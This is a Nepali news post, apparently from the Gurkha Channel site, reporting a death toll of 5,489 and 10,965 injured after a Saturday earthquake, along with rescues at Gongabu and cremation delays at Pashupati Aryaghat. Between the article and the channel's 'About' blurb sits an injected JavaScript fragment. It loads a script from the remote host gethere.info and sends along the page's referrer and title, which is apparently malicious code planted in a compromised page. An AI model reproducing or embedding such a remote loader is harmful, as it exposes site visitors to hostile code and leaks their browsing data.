शनिबार गएको भूकम्पमा परी ज्यान गुमाउनेको संख्या पाँच हजार चार सय ८९ पुगेको

admin Avatar

शनिबार गएको भूकम्पमा परी ज्यान गुमाउनेको संख्या पाँच हजार चार सय ८९ पुगेको छ । १० हजार नौ सय ६५ जना घाइते भएको छ । उनीहरुको विभिन्न अस्पतालमा उपचार भइरहेको छ।


भूकम्पले भग्नावशेष बनाएका स्थानमा उद्दार कार्य जारी रहेको छ । केही ठाउँमा अझै पनि जीवितै उद्दार गरिएको छ । नुवाकोटका पेम्बा लामालाई आजै गोंगबुबाट जीवितै उद्दार गरिएको छ।
भग्नावशेष भएका स्थानमा पुरिएर ज्यान गुमाउनेहरुको संख्या बढ्दै गएको छ । भूकम्पमा परी ज्यान गुमाउनेको संख्या धेरै भएपछि दाहसंस्कारमा पनि कठिनाइ उत्पन्न भएको छ । एउटा शवलाई जलाउन धेरैबेरसम्म आर्यघाटमा पर्खनुपर्ने अवस्था रहेको छ।
पशुपति आर्यघाटमा पुगेर कमल राना र बिक्रम शाक्यले तयार पारेको स्थलगत रिपोर्ट……..

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories